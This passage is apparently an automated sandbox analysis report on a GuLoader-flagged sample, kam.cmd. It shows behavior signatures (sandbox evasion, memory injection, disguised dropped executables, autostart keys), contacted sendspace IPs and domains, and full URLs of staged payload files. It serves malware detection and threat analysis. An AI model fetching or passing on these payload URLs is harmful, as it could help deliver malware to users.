Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446714 Sample: kam.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 www.sendspace.com 2->40 42 fs13n1.sendspace.com 2->42 44 fs03n4.sendspace.com 2->44 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 Yara detected GuLoader 2->62 64 5 other signatures 2->64 9 cmd.exe 1 2->9         started        signatures3 process4 signatures5 66 Suspicious powershell command line found 9->66 68 Very long command line found 9->68 12 powershell.exe 14 23 9->12         started        16 conhost.exe 9->16         started        process6 dnsIp7 48 fs03n4.sendspace.com 69.31.136.17, 443, 49705 GTT-BACKBONEGTTDE United States 12->48 50 www.sendspace.com 104.21.28.80, 443, 49704, 49713 CLOUDFLARENETUS United States 12->50 76 Suspicious powershell command line found 12->76 78 Very long command line found 12->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 12->80 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->52 54 Writes to foreign memory regions 18->54 56 Found suspicious powershell code related to unpacking or dynamic code loading 18->56 25 wab.exe 17 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 46 fs13n1.sendspace.com 69.31.136.57, 443, 49714 GTT-BACKBONEGTTDE United States 25->46 32 C:\Windows\svchost.com, PE32 25->32 dropped 34 C:\Users\user\AppData\Local\Temp\chrome.exe, PE32 25->34 dropped 36 C:\ProgramData\...\VC_redist.x64.exe, PE32 25->36 dropped 38 149 other malicious files 25->38 dropped 70 Creates an undocumented autostart registry key 25->70 72 Drops executable to a common third party application directory 25->72 74 Infects executable files (exe, dll, sys, html) 25->74 file13 signatures14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
69.31.136.17
 fs03n4.sendspace.com United States
3257 GTT-BACKBONEGTTDE false
104.21.28.80
 www.sendspace.com United States
13335 CLOUDFLARENETUS false
69.31.136.57
 fs13n1.sendspace.com United States
3257 GTT-BACKBONEGTTDE false

Contacted Domains

Name IP Active
fs03n4.sendspace.com 69.31.136.17 true
www.sendspace.com 104.21.28.80 true
fs13n1.sendspace.com 69.31.136.57 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin false
  • Avira URL Cloud: safe
 unknown
https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm false
  • Avira URL Cloud: safe
 unknown
https://www.sendspace.com/pro/dl/12acii false
  • Avira URL Cloud: safe
 unknown
https://www.sendspace.com/pro/dl/i41a76 false
  • Avira URL Cloud: safe
 unknown